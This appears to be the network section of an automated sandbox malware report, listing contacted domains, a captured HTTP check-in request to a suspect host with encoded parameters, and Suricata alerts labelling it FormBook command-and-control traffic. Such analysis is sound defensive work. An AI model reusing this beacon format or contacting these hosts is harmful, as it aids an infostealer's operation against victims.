Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.mnbvending.com | | |
www.kaka.digital | | |
www.1527brokenoakdrive.site | 172.67.187.223 | |
GET 404 http://www.1527brokenoakdrive.site/nk6l/?w2J=jP0XjeSgSwb6GljuZIUzr+Wr4LOzEwTYnwZ8MMYm+mej+m4fHGukAN1SliFlR5pUPmwRfLY8&tFQh=YP4Hk0O8

Request:

```http
GET /nk6l/?w2J=jP0XjeSgSwb6GljuZIUzr+Wr4LOzEwTYnwZ8MMYm+mej+m4fHGukAN1SliFlR5pUPmwRfLY8&tFQh=YP4Hk0O8 HTTP/1.1
Host: www.1527brokenoakdrive.site
Connection: close
```

Response headers:

```http
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2021 04:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nk3bAn7iC6caaFfei4ewPb%2FXPf%2FGi%2BnS7IDP%2FJxpJ7NmVa2QllNYhDrB6x%2BzDdNliu1P8CmA3QuW9YiZ0ZZ0yL08N4KimkPufim24fgxXgEwDshEqbwxs%2Bx%2FkGey9pBs1FE1ulxcT%2F7v%2FpJSN7I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ad51db45e331f76-NRT
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49165 -> 104.21.64.211:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49165 -> 104.21.64.211:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49165 -> 104.21.64.211:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts